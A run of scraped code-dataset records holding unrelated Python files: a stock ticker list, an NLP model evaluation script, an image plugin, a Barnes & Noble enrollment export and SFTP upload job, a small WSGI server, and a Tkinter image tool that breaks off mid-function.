('OKE','Energy','USD'),\n ('OMC','Communication Services','USD'),\n ('ORCL','Information Technology','USD'),\n ('ORLY','Consumer Discretionary','USD'),\n ('OXY','Energy','USD'),\n ('PAYX','Information Technology','USD'),\n ('PBCT','Financials','USD'),\n ('PCAR','Industrials','USD'),\n ('PEG','Utilities','USD'),\n ('PEP','Consumer Staples','USD'),\n ('PFE','Health Care','USD'),\n ('PFG','Financials','USD'),\n ('PG','Consumer Staples','USD'),\n ('PGR','Financials','USD'),\n ('PH','Industrials','USD'),\n ('PHM','Consumer Discretionary','USD'),\n ('PKG','Materials','USD'),\n ('PKI','Health Care','USD'),\n ('PLD','Real Estate','USD'),\n ('PM','Consumer Staples','USD'),\n ('PNC','Financials','USD'),\n ('PNR','Industrials','USD'),\n ('PNW','Utilities','USD'),\n ('PPG','Materials','USD'),\n ('PPL','Utilities','USD'),\n ('PRGO','Health Care','USD'),\n ('PRU','Financials','USD'),\n ('PSA','Real Estate','USD'),\n ('PSX','Energy','USD'),\n ('PVH','Consumer Discretionary','USD'),\n ('PWR','Industrials','USD'),\n ('PXD','Energy','USD'),\n ('PYPL','Information Technology','USD'),\n ('QCOM','Information Technology','USD'),\n ('QRVO','Information Technology','USD'),\n ('RCL','Consumer Discretionary','USD'),\n ('RE','Financials','USD'),\n ('REG','Real Estate','USD'),\n ('REGN','Health Care','USD'),\n ('RF','Financials','USD'),\n ('RHI','Industrials','USD'),\n ('RHT','Information Technology','USD'),\n ('RJF','Financials','USD'),\n ('RL','Consumer Discretionary','USD'),\n ('RMD','Health Care','USD'),\n ('ROK','Industrials','USD'),\n ('ROL','Industrials','USD'),\n ('ROP','Industrials','USD'),\n ('ROST','Consumer Discretionary','USD'),\n ('RSG','Industrials','USD'),\n ('RTN','Industrials','USD'),\n ('SBAC','Real Estate','USD'),\n ('SBUX','Consumer Discretionary','USD'),\n ('SCHW','Financials','USD'),\n ('SEE','Materials','USD'),\n ('SHW','Materials','USD'),\n ('SIVB','Financials','USD'),\n ('SJM','Consumer Staples','USD'),\n ('SLB','Energy','USD'),\n ('SLG','Real Estate','USD'),\n ('SNA','Industrials','USD'),\n ('SNPS','Information Technology','USD'),\n ('SO','Utilities','USD'),\n ('SPG','Real Estate','USD'),\n ('SPGI','Financials','USD'),\n ('SRE','Utilities','USD'),\n ('STI','Financials','USD'),\n ('STT','Financials','USD'),\n ('STX','Information Technology','USD'),\n ('STZ','Consumer Staples','USD'),\n ('SWK','Industrials','USD'),\n ('SWKS','Information Technology','USD'),\n ('SYF','Financials','USD'),\n ('SYK','Health Care','USD'),\n ('SYMC','Information Technology','USD'),\n ('SYY','Consumer Staples','USD'),\n ('T','Communication Services','USD'),\n ('TAP','Consumer Staples','USD'),\n ('TDG','Industrials','USD'),\n ('TEL','Information Technology','USD'),\n ('TFX','Health Care','USD'),\n ('TGT','Consumer Discretionary','USD'),\n ('TIF','Consumer Discretionary','USD'),\n ('TJX','Consumer Discretionary','USD'),\n ('TMK','Financials','USD'),\n ('TMO','Health Care','USD'),\n ('TPR','Consumer Discretionary','USD'),\n ('TRIP','Communication Services','USD'),\n ('TROW','Financials','USD'),\n ('TRV','Financials','USD'),\n ('TSCO','Consumer Discretionary','USD'),\n ('TSN','Consumer Staples','USD'),\n ('TSS','Information Technology','USD'),\n ('TTWO','Communication Services','USD'),\n ('TWTR','Communication Services','USD'),\n ('TXN','Information Technology','USD'),\n ('TXT','Industrials','USD'),\n ('UA','Consumer Discretionary','USD'),\n ('UAA','Consumer Discretionary','USD'),\n ('UAL','Industrials','USD'),\n ('UDR','Real Estate','USD'),\n ('UHS','Health Care','USD'),\n ('ULTA','Consumer Discretionary','USD'),\n ('UNH','Health Care','USD'),\n ('UNM','Financials','USD'),\n ('UNP','Industrials','USD'),\n ('UPS','Industrials','USD'),\n ('URI','Industrials','USD'),\n ('USB','Financials','USD'),\n ('UTX','Industrials','USD'),\n ('V','Information Technology','USD'),\n ('VAR','Health Care','USD'),\n ('VFC','Consumer Discretionary','USD'),\n ('VIAB','Communication Services','USD'),\n ('VLO','Energy','USD'),\n ('VMC','Materials','USD'),\n ('VNO','Real Estate','USD'),\n ('VRSK','Industrials','USD'),\n ('VRSN','Information Technology','USD'),\n ('VRTX','Health Care','USD'),\n ('VTR','Real Estate','USD'),\n ('VZ','Communication Services','USD'),\n ('WAT','Health Care','USD'),\n ('WBA','Consumer Staples','USD'),\n ('WCG','Health Care','USD'),\n ('WDC','Information Technology','USD'),\n ('WEC','Utilities','USD'),\n ('WELL','Real Estate','USD'),\n ('WFC','Financials','USD'),\n ('WHR','Consumer Discretionary','USD'),\n ('WLTW','Financials','USD'),\n ('WM','Industrials','USD'),\n ('WMB','Energy','USD'),\n ('WMT','Consumer Staples','USD'),\n ('WRK','Materials','USD'),\n ('WU','Information Technology','USD'),\n ('WY','Real Estate','USD'),\n ('WYNN','Consumer Discretionary','USD'),\n ('XEC','Energy','USD'),\n ('XEL','Utilities','USD'),\n ('XLNX','Information Technology','USD'),\n ('XOM','Energy','USD'),\n ('XRAY','Health Care','USD'),\n ('XRX','Information Technology','USD'),\n ('XYL','Industrials','USD'),\n ('YUM','Consumer Discretionary','USD'),\n ('ZBH','Health Care','USD'),\n ('ZION','Financials','USD'),\n ('ZTS','Health Care','USD')\n ]\nsmi = [\n ('ABBN.SWI','','CHF'),\n ('ADEN.SWI','','CHF'),\n ('BAER.SWI','','CHF'),\n ('CFR.SWI','','CHF'),\n ('CSGN.SWI','','CHF'),\n ('GEBN.SWI','','CHF'),\n ('GIVN.SWI','','CHF'),\n ('LHN.SWI','','CHF'),\n ('LONN.SWI','','CHF'),\n ('NESN.SWI','','CHF'),\n ('NOVN.SWI','','CHF'),\n ('ROG.SWI','','CHF'),\n ('SCMN.SWI','','CHF'),\n ('SGSN.SWI','','CHF'),\n ('SIKA.SWI','','CHF'),\n ('SLHN.SWI','','CHF'),\n ('SREN.SWI','','CHF'),\n ('UBSG.SWI','','CHF'),\n ('UHR.SWI','','CHF'),\n ('ZURN.SWI','','CHF')\n \n ]","sub_path":"tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":23151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"428042245","text":"from tqdm import tqdm\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom .preprocess import AttnDataset\nfrom .nn_models.attn_aggregate import AttnAggregateModel\nfrom .nn_models.baseline import BaselineModel\nfrom .evaluation.eval_metric import eval_sp\nfrom .evaluation.analysis import get_analysis\nfrom .std import *\nfrom . import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-llv',\n default='INFO',\n help='Logging level')\n parser.add_argument('-log',\n default=None,\n help='Output log file')\n parser.add_argument('-model_file_name',\n required=True,\n help='trained model_file_name')\n parser.add_argument('-data_type',\n required=True)\n parser.add_argument('-adjust_weight',\n default=False,\n action='store_true')\n parser.add_argument('-transform',\n default=False,\n action='store_true')\n parser.add_argument('-batch_size',\n default=16,\n type=int,\n help='batch size')\n parser.add_argument('-sentence',\n type=int,\n default=1)\n parser.add_argument('-multiBERTs',\n default=False,\n action='store_true')\n parser.add_argument('-max_length',\n type=int,\n default=512)\n args = parser.parse_args()\n\n myLogFormat = '%(asctime)s **%(levelname)s** [%(name)s:%(lineno)s] - %(message)s'\n logging.basicConfig(level=str2llv(args.llv), format=myLogFormat, datefmt='%Y/%m/%d %H:%M:%S')\n if args.log:\n myhandlers = log_w(args.log)\n logger.addHandler(myhandlers)\n logger.log(100, ' '.join(sys.argv))\n else:\n logger.log(100, ' '.join(sys.argv))\n \n trained_baseline_model = BaselineModel()\n model = AttnAggregateModel(args.sentence, args.adjust_weight, trained_baseline_model=trained_baseline_model, transform=args.transform)\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model_folder = str(config.TRAINED_MODELS / args.model_file_name)\n model_path = get_model_path(model_folder)\n model.load_state_dict(torch.load(model_path, map_location=device))\n model.eval()\n \n # train set\n logger.info(\"Evaluate train set\")\n train_data = json_load(config.FGC_TRAIN)\n train_set = AttnDataset(train_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, train_data, args.batch_size, train_set, args.model_file_name, device, \"train_analysis.txt\")\n \n # dev set\n logger.info(\"Evaluate dev set\")\n dev_data = json_load(config.FGC_DEV)\n dev_set = AttnDataset(dev_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, dev_data, args.batch_size, dev_set, args.model_file_name, device, \"dev_analysis.txt\")\n \n # test set\n logger.info(\"Evaluate test set\")\n test_data = json_load(config.FGC_TEST)\n test_set = AttnDataset(test_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, test_data, args.batch_size, test_set, args.model_file_name, device, \"test_analysis.txt\")\n\n\ndef get_eval(model, data, batch_size, dataset, model_file_path, device, output_file_name):\n cumulative_len = dataset.cumulative_len\n indices_golds = dataset.shints\n \n with torch.no_grad():\n counter = 0\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=batch_size)\n indices_preds = []\n all_weights = []\n all_scores = []\n\n current_document_labels = []\n current_document_weights = []\n current_document_scores = []\n for batch in tqdm(dataloader):\n for key in batch.keys():\n batch[key] = batch[key].to(device)\n predict_se = model.module.predict if hasattr(model, 'module') else model.predict\n current_labels, current_scores, current_weights = predict_se(batch)\n\n for label, weight, score in zip(current_labels, current_weights, current_scores):\n if counter + 1 in cumulative_len:\n current_document_labels += label\n current_document_weights.append(weight)\n current_document_scores += score\n current_document_indices = np.where(np.array(current_document_labels) == 1)[0].tolist()\n indices_preds.append(current_document_indices)\n all_weights.append(current_weights)\n all_scores.append(current_document_scores)\n current_document_labels = []\n current_document_weights = []\n current_document_scores = []\n \n else:\n current_document_labels += label\n current_document_weights.append(weight)\n current_document_scores += score\n \n counter = counter + 1\n \n logger.debug(\"indices_golds:{}\".format(len(indices_golds)))\n logger.debug(\"indices_preds:{}\".format(len(indices_preds)))\n\n assert len(indices_golds) == len(indices_preds) == len(all_weights)\n\n metrics = eval_sp(indices_golds, indices_preds)\n preprocessed_data = eval_preprocess(data, indices_preds, all_weights, all_scores)\n with open(model_file_path+'/'+output_file_name, 'w') as f:\n f.write(str(metrics) + '\\n')\n f.write(get_analysis(preprocessed_data))\n\n\ndef eval_preprocess(data, indices_preds, all_weights, all_scores):\n for document_i, document in enumerate(data):\n document['QUESTIONS'][0]['sp'] = indices_preds[document_i]\n document['QUESTIONS'][0]['scores'] = all_scores[document_i]\n document['QUESTIONS'][0]['weights'] = all_weights[document_i]\n return data\n\n\nif __name__=='__main__':\n main()\n\n","sub_path":"src/predict_attn_aggregate.py","file_name":"predict_attn_aggregate.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"356720087","text":"import os\nimport csv\nimport maskgen\nfrom maskgen.external.api import BrowserAPI\n\n\"\"\"\nPick an image from the browser .\nUsed with batch project's ImageSelectionPluginOperation\n\"\"\"\n\ndef loadExclusions(filename):\n import json\n with open(filename,'r') as fp:\n return json.load(fp, encoding='utf-8')['data']\n\ndef transform(img, source, target, **kwargs):\n import json\n api = BrowserAPI()\n prefix = kwargs['prefix'] if 'prefix' in kwargs['prefix'] else 'images'\n directory = kwargs['directory'] if 'directory' in kwargs else '.'\n query_param = kwargs['query json'] if 'query json' in kwargs else '{}'\n query = query_param if type(query_param) == dict else json.loads(query_param)\n exclusions = None\n skip = set()\n if 'exclusions file' in kwargs:\n source_name = os.path.basename(source)\n exclusions_map = loadExclusions(kwargs['exclusions file'])\n for k,v in exclusions_map.iteritems():\n skip.add(k)\n if source_name[0:len(k)] == k:\n exclusions = v\n return {'file': api.pull(query, directory=directory, exclusions=exclusions,prefix = prefix)}, None\n\n\ndef operation():\n return {'name': 'SelectFile',\n 'category': 'Select',\n 'description': 'Select image based on a pairing to an existing image.',\n 'software': 'maskgen',\n 'version': maskgen.__version__[0:3],\n 'arguments': {'directory': {'type': \"text\",\n 'description': \"location of the paired images\"},\n 'prefix': {'type': \"list\",\n 'values': ['images','videos'],\n 'description': \"type\"},\n 'exclusions file': {\n 'type': \"text\",\n 'description': \"location of file with exclusions\"},\n 'query json': {'type': \"text\",\n 'description': \"JSON queru\"}\n },\n 'transitions': [\n 'image.image'\n ]\n }\n\n\ndef suffix():\n return None\n","sub_path":"plugins/PickMediaFromBrowser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"356839847","text":"import json\n\ndef saveToFile(data,fileName=\"dataToFile\",fileType=\"txt\"):\n dataFile=open(\"../data/\"+fileName+\".\"+fileType,'w')\n if fileType=='txt':\n fileContent=''\n for row in data:\n for d in row:\n fileContent+=str(d)+'\\t'\n fileContent+='\\n'\n dataFile.write(fileContent)\n if fileType=='json':\n dataFile.write(json.dumps(data))\n dataFile.close()","sub_path":"code/dataToFile.py","file_name":"dataToFile.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"116969117","text":"#! /usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport django\r\nimport os\r\nimport pysftp\r\nimport sys\r\nimport shutil\r\nimport zipfile\r\nimport os.path\r\nimport datetime\r\n\r\nfrom datetime import date, timedelta, datetime\r\n\r\nfrom os import path\r\n\r\nfrom django.conf import settings\r\nfrom djimix.core.utils import get_connection\r\nfrom djimix.core.utils import xsql\r\nfrom django.core.cache import cache\r\nfrom djtools.utils.mail import send_mail\r\n\r\nfrom djmapache.sql.barnesandnoble.crs_enr_sql import COURSES, USERS, \\\r\n ENROLLMENTS\r\n\r\n# django settings for shell environment\r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djmapache.settings.shell')\r\n\r\n# required for interacting with django infrastructure e.g. templates\r\ndjango.setup()\r\n\r\n\r\n# informix environment\r\nos.environ['INFORMIXSERVER'] = settings.INFORMIXSERVER\r\nos.environ['DBSERVERNAME'] = settings.DBSERVERNAME\r\nos.environ['INFORMIXDIR'] = settings.INFORMIXDIR\r\nos.environ['ODBCINI'] = settings.ODBCINI\r\nos.environ['ONCONFIG'] = settings.ONCONFIG\r\nos.environ['INFORMIXSQLHOSTS'] = settings.INFORMIXSQLHOSTS\r\nos.environ['LD_LIBRARY_PATH'] = settings.LD_LIBRARY_PATH\r\nos.environ['LD_RUN_PATH'] = settings.LD_RUN_PATH\r\n\r\nDEBUG = settings.DEBUG\r\nINFORMIX_DEBUG = settings.INFORMIX_DEBUG\r\nBASE_DIR = settings.BASE_DIR\r\nTO = settings.BARNESNOBLE_TO_EMAIL\r\nFROM = settings.BARNESNOBLE_FROM_EMAIL\r\nSUBJECT = \"[Barnes & Noble] upload {status}\".format\r\n\r\n\r\ndef fn_format_date(date):\r\n if len(date) == 10:\r\n ret = date[6:] + \"-\" + date[:2] + '-' + date[3:5]\r\n else:\r\n ret = \"\"\r\n return ret\r\n\r\ndef main():\r\n \"\"\"Barnes and Noble Upload.\"\"\"\r\n ###########################################################################\r\n # OpenSSH 7.0 and greater disable the ssh-dss (DSA) public key algorithm,\r\n # which B&N use for authentication on their servers, so you have to add\r\n # ssh-dss to the ssh/sftp command:\r\n #\r\n # -oHostKeyAlgorithms=+ssh-dss\r\n #\r\n # or add the following to the cron user's .ssh/config file:\r\n #\r\n # Host rex-sftp.bncollege.com\r\n # HostName rex-sftp.bncollege.com\r\n # HostKeyAlgorithms=+ssh-dss\r\n ###########################################################################\r\n\r\n # Defines file names and directory location\r\n # bn_course_fil = ('{0}carthage_students.txt'.format(\r\n # settings.ADIRONDACK_TXT_OUTPUT)\r\n # )\r\n\r\n # bn_course_file = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"courses.csv\"\r\n # bn_enr_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"enrollments.csv\"\r\n # bn_usr_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"users.csv\"\r\n # bn_zip_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"carthage_bn\"\r\n\r\n \"\"\"To get the last query date from cache\"\"\"\r\n\r\n last_sql_date = cache.get('BN_Sql_date')\r\n # print(last_sql_date)\r\n\r\n bn_course_file = \"courses.csv\"\r\n bn_enr_fil = \"enrollments.csv\"\r\n bn_usr_fil = \"users.csv\"\r\n bn_zip_fil = \"carthage_bncroster.zip\"\r\n # /data2/www/data/barnesandnoble/enrollments/carthage_bncroster.zip\"\"\r\n\r\n # print(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil)\r\n if path.exists(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil):\r\n os.remove(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil)\r\n\r\n \"\"\"Create the headers for the three files\"\"\"\r\n fil = open(bn_course_file, 'w')\r\n fil.write(\"recordNumber,campus,school,institutionDepartment,term,\"\r\n \"department,course,section,campusTitle,schoolTitle,\"\r\n \"institutionDepartmentTitle,courseTitle,\"\r\n \"institutionCourseCode,institutionClassCode,\"\r\n \"institutionSubjectCodes,institutionSubjectsTitle,\"\r\n \"crn,termTitle,termType,termStartDate,termEndDate,\"\r\n \"sectionStartDate,sectionEndDate,classGroupId,\"\r\n \"estimatedEnrollment\" + \"\\n\")\r\n fil.close()\r\n\r\n fil1 = open(bn_enr_fil, 'w')\r\n fil1.write(\"recordNumber,campus,school,institutionDepartment,term,\"\r\n \"department,course,section,email,firstName,middleName,\"\r\n \"lastName,userRole,sisUserId,includedInCourseFee,\"\r\n \"studentFullPartTimeStatus,creditHours\" + \"\\n\")\r\n fil1.close()\r\n\r\n\r\n fil2 = open(bn_usr_fil, 'w')\r\n fil2.write(\"recordNumber,campus,school,email,firstName,middleName,\"\r\n \"lastName,userRole,sisUserId\" + \"\\n\")\r\n fil2.close()\r\n\r\n\r\n try:\r\n # set global variable\r\n # global EARL\r\n # # determines which database is being called from the command line\r\n # if database == 'cars':\r\n EARL = settings.INFORMIX_ODBC\r\n # elif database == 'train':\r\n # EARL = settings.INFORMIX_ODBC_TRAIN\r\n # else:\r\n # print(\"database must be: 'cars' or 'train'\")\r\n # exit(-1)\r\n\r\n crs_qry = COURSES\r\n\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n blank = \"\"\r\n with connection:\r\n data_result = xsql(\r\n crs_qry, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Course Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)cd\r\n cnt = 1\r\n\r\n # print(\"Open file 1\")\r\n fil = open(bn_course_file, 'a')\r\n for row in ret:\r\n # fil.write(row)\r\n campus = '\"' + row[0] + '\"'\r\n # school = '\"' + row[1] + '\"'\r\n school = '\"' + blank + '\"'\r\n institutionDepartment = row[2]\r\n term = '\"' + row[3] + '\"'\r\n department = '\"' + row[4] + '\"'\r\n course = '\"' + row[5] + '\"'\r\n SectionCode = '\"' + row[6] + '\"'\r\n campusTitle = '\"' + row[7] + '\"'\r\n # schoolTitle = '\"' + row[8] + '\"'\r\n schoolTitle = '\"' + blank + '\"'\r\n institutionDepartmentTitle = '\"' + row[9] + '\"'\r\n courseTitle = '\"' + row[10].strip() + '\"'\r\n institutionCourseCode = '\"' + row[11] + '\"'\r\n institutionClassCode = '\"' + row[12] + '\"'\r\n institutionSubjectCodes = '\"' + row[13] + '\"'\r\n institutionSubjectsTitle = '\"' + row[14].strip() + '\"'\r\n crn = '\"' + row[15] + '\"'\r\n termTitle = '\"' + row[16] + '\"'\r\n termType = '\"' + row[17] + '\"'\r\n termStartDate = '\"' + fn_format_date(row[18]) + '\"'\r\n termEndDate = '\"' + fn_format_date(row[19]) + '\"'\r\n sectionStartDate = '\"' + fn_format_date(row[20]) + '\"'\r\n sectionEndDate = '\"' + fn_format_date(row[21]) + '\"'\r\n classGroupId = '\"' + row[22] + '\"'\r\n estimatedEnrollment = str(row[23])\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n institutionDepartment + \",\" + term + \",\" + \\\r\n department + \",\" + course + \",\" + SectionCode + \",\" + \\\r\n campusTitle + \",\" + schoolTitle + \",\" + \\\r\n institutionDepartmentTitle + \",\" + courseTitle \\\r\n + \",\" + institutionCourseCode + \",\" + \\\r\n institutionClassCode + \",\" + institutionSubjectCodes \\\r\n + \",\" + institutionSubjectsTitle + \",\" + crn + \",\" + \\\r\n termTitle + \",\" + termType + \",\" + termStartDate \\\r\n + \",\" + termEndDate + \",\" + sectionStartDate + \",\" + \\\r\n sectionEndDate + \",\" + classGroupId + \",\" + \\\r\n estimatedEnrollment + \"\\n\"\r\n\r\n fil.write(lin)\r\n cnt = cnt + 1\r\n fil.close()\r\n # print(\"Close file 1\")\r\n\r\n\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n with connection:\r\n data_result = xsql(\r\n USERS, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"User Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)\r\n cnt = 1\r\n # print(\"Open file 2\")\r\n\r\n fil2 = open(bn_usr_fil, 'a')\r\n for row in ret:\r\n # print(row)\r\n campus = '\"' + row[0] + '\"'\r\n school = '\"' + blank + '\"'\r\n email = '\"' + row[2] + '\"'\r\n firstname = '\"' + row[3] + '\"'\r\n middlename = '\"' + row[4] + '\"'\r\n lastname = '\"' + row[5] + '\"'\r\n role = '\"' + row[6].strip() + '\"'\r\n username = '\"' + str(row[8]) + '\"'\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n email + \",\" + firstname + \",\" + \\\r\n middlename + \",\" + lastname + \",\" + role + \",\" + \\\r\n username + \"\\n\"\r\n\r\n # print(lin)\r\n\r\n fil2.write(lin)\r\n cnt = cnt + 1\r\n fil2.close()\r\n # print(\"Close file 2\")\r\n\r\n\r\n \"\"\"Connect to Database\"\"\"\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n with connection:\r\n data_result = xsql(\r\n ENROLLMENTS, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"ENROLLMENTS Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)\r\n cnt = 1\r\n # print(\"Open file 3\")\r\n fil3 = open(bn_enr_fil, 'a')\r\n for row in ret:\r\n # print(row)\r\n campus = '\"' + row[0] + '\"'\r\n school = '\"' + blank + '\"'\r\n inst_dept = '\"' + row[2] + '\"'\r\n term = '\"' + row[3] + '\"'\r\n dept = '\"' + row[4] + '\"'\r\n course = '\"' + row[5] + '\"'\r\n section = '\"' + row[6].strip() + '\"'\r\n email = '\"' + row[7] + '\"'\r\n\r\n firstname = '\"' + row[8] + '\"'\r\n middlename = '\"' + row[9] + '\"'\r\n lastname = '\"' + row[10] + '\"'\r\n role = '\"' + row[11] + '\"'\r\n userid = '\"' + str(row[12]) + '\"'\r\n includeinfee = '\"' + row[13] + '\"'\r\n fulltimestatus = '\"' + row[14] + '\"'\r\n credit_hours = '\"' + str(row[15]) + '\"'\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n inst_dept + \",\" + term + \",\" + \\\r\n dept + \",\" + course + \",\" + \\\r\n section + \",\" + email + \",\" + \\\r\n firstname + \",\" + middlename + \",\" + \\\r\n lastname + \",\" + role + \",\" + userid + \",\" + \\\r\n includeinfee + \",\" + fulltimestatus + \",\" + \\\r\n credit_hours + \"\\n\"\r\n\r\n # print(lin)\r\n fil3.write(lin)\r\n cnt = cnt + 1\r\n fil3.close()\r\n # print(\"Close file 3\")\r\n\r\n\r\n \"\"\"Create Archive\"\"\"\r\n zf = zipfile.ZipFile(bn_zip_fil, mode='w')\r\n\r\n zf.write(bn_course_file)\r\n zf.write(bn_usr_fil)\r\n zf.write(bn_enr_fil)\r\n\r\n \"\"\"Move Zip File\"\"\"\r\n shutil.move(bn_zip_fil, settings.BARNES_N_NOBLE_CSV_OUTPUT)\r\n\r\n \"\"\"Send the file...\"\"\"\r\n cnopts = pysftp.CnOpts()\r\n cnopts.hostkeys = None\r\n xtrnl_connection = {\r\n 'host': settings.BARNESNOBLE_AIP_HOST,\r\n 'username': settings.BARNESNOBLE_AIP_USER,\r\n 'port': settings.BARNESNOBLE_AIP_PORT,\r\n 'private_key': settings.BARNESNOBLE_AIP_KEY,\r\n 'cnopts': cnopts,\r\n }\r\n\r\n try:\r\n with pysftp.Connection(**xtrnl_connection) as sftp:\r\n sftp.cwd('inbox')\r\n print(\"Connected\")\r\n\r\n remotepath = sftp.listdir()\r\n # print(remotepath)\r\n\r\n phile = os.path.join(settings.BARNES_N_NOBLE_CSV_OUTPUT\r\n + bn_zip_fil)\r\n print(\"Put \" + phile)\r\n sftp.put(phile)\r\n sftp.close()\r\n\r\n # print(\"Remove temp csv files\")\r\n os.remove(bn_usr_fil)\r\n os.remove(bn_course_file)\r\n os.remove(bn_enr_fil)\r\n\r\n except Exception as error:\r\n # print(\"Unable to PUT settings.BARNES_N_NOBLE_CSV_OUTPUT + \"\r\n # \"bn_zip_fil to Barnes and Noble \"\r\n # \"server.\\n\\n{0}\".format(error))\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Unable to PUT settings.BARNES_N_NOBLE_CSV_OUTPUT \" \\\r\n + bn_zip_fil \\\r\n + \" to Barnes and Noble server.\\n\\n{0}\".format(error)\r\n\r\n send_mail(None, TO, SUBJECT(status='failed'), FROM,\r\n 'email.html', body, )\r\n\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n #To set a new date in cache\r\n a = datetime.now()\r\n last_sql_date = a.strftime('%Y-%m-%d %H:%M:%S')\r\n cache.set('BN_Sql_date', last_sql_date)\r\n\r\n except Exception as e:\r\n print(\"Error in main: \" + str(e))\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Error in main: \" + str(e)\r\n send_mail(\r\n None,\r\n settings.BARNES_N_NOBLE_TO_EMAIL,\r\n SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL,\r\n 'email.html',\r\n BODY,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","sub_path":"djmapache/bin/barnesandnoble_crs_enr.py","file_name":"barnesandnoble_crs_enr.py","file_ext":"py","file_size_in_byte":15159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"259040446","text":"import mimetypes\nfrom wsgiref.simple_server import make_server\n\n\ndef app(environ, start_response):\n path_info = environ[\"PATH_INFO\"]\n mimetypes.add_type('application/wasm', '.wasm')\n mimetypes.add_type('text/html', '.data')\n if path_info == '/':\n path_info = \"/olapy.html\"\n\n resource = \"_build\" + path_info\n headers = []\n headers.append((\"Content-Type\", mimetypes.guess_type(path_info.split(\"/\")[-1])[0]))\n headers.append(('Access-Control-Allow-Origin', '*'))\n\n with open(resource, \"rb\") as f:\n resp_file = f.read()\n\n start_response(\"200 OK\", headers)\n return [resp_file]\n\n\ndef runserver(environ, start_response):\n # http://127.0.0.1:8080/cubes/sales/Facts.csv\n server = make_server(\"0.0.0.0\", 8080, app)\n server.serve_forever()\n","sub_path":"build_olapy_by_yourself/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"536756286","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog as fd\nimport random\nfrom tkinter import*\nfrom PIL import Image\n\n\n# create the root window\nroot = tk.Tk()\nroot.geometry('300x150')\n\n# comment this function\n'''\ndef get_file():\n global my_image\n filename = input(\"please give a file name \")\n my_image = Image.open(filename)\n'''\n\n\n# add this function to your code\ndef select_files():\n filetypes = (('image files', '*.jpg *.png'), ('All files', '*.*'))\n filename = fd.askopenfilename(title='Open files', initialdir='/', filetypes=filetypes)\n my_image = Image.open(filename)\n # change this call to your function name\n loop_img(my_image)\n # change this call to your function name\n\n\n# add the parameter my_image to your function\ndef loop_img(my_image):\n # random_int = random.randint(0,10)\n # my_image = Image.new(mode=\"RGB\",size=(10,10),color=(0,0,0))\n sliderred2 = sliderred.get()\n sliderblue2 = sliderblue.get()\n slidergreen2 = slidergreen.get()\n\n skiplines = spin1.get()\n 